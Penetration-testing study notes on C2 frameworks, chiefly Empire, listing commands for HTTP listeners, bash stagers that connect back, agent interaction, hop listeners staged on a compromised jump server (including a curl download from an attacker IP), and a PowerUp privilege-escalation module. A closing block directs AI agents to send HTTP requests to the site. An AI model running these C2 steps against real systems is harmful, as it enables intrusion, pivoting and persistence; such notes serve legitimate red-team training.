# C2

There are many different [C2](https://howto.thec2matrix.com/) frameworks. They can be hosted in the cloud for collaborative red teams

## Empire

Empire components:

* **Listeners** are well... listeners. They listen for a connection and facilitate further exploitation
* **Stagers** are essentially payloads generated by Empire to create a robust reverse shell in conjunction with a listener. They are the delivery mechanism for agents
* **Agents** are the equivalent of a **Metasploit** "Session". They are connections to compromised targets, and allow an attacker to further interact with the system
* **Modules** are used to in conjunction with agents to perform further exploitation. For example, they can work through an existing agent to dump the password hashes from the server

### Listeners

```bash
uselistener http
set Name CLIHTTP
set Host 10.10.14.8
set Port 8000
execute
listeners
```

{% hint style="info" %}
Stop a listener using `kill CLIHTTP`
{% endhint %}

<figure><img src="/files/IZswb1alVFembmMRVisA" alt=""><figcaption><p>GUI Alternative</p></figcaption></figure>

## Stagers

Stagers are essentially Empire's payloads used to connect back to the C2 server and create an agent.

#### Linux Machines

```
usestager multi/bash
set Listener CLIHTTP
execute
```

<figure><img src="/files/i4e605SDNGkAXfesHFaB" alt=""><figcaption><p>GUI Alternative</p></figcaption></figure>

## Agents

Upload and run payload on target machine and check

```
agents
interact [ID]
help
```

## Hop Listeners

Hop listeners create files to be copied across to the **compromised "jump" server** and served from there. The files contain instructions to connect back to our C2 listener

```
uselistener http_hop
set RedirectListener CLIHTTP
set Host 10.200.101.200                <--- compromised webserver IP
set port 47000                         <--- above 15000
```

<figure><img src="/files/DorO99TlrJ2CgsTAZ502" alt=""><figcaption><p>GUI Alternative</p></figcaption></figure>

### Hop Listener Stager

```
usestager multi/launcher
set Listener http_hop
execute
```

#### Jump server (compromised webserver) setup

On Attacker machine

```
cd /tmp/http_hop
sudo zip -r hop.zip *
python3 -m http.server 80
```

On jumpserver

```
mkdir /tmp/hop-adot8 && cd /tmp/hop-adot8
curl http://10.50.102.164/hop.zip -o hop.zip
unzip hop.zip
php -S 0.0.0.0:47000 &                <-- Serves on php payloads (php must be installed)
firewall-cmd --zone=public --add-port 47000/tcp
```

Execute Payload on internal target

## Modules

PowerUp Invoke-AllChecks example

```
usemodule powershell_privesc_powerup_allchecks
set Agent [ID]
execute
agents
intereact [ID]
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pnpt.adot8.com/post-exploitation/c2.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.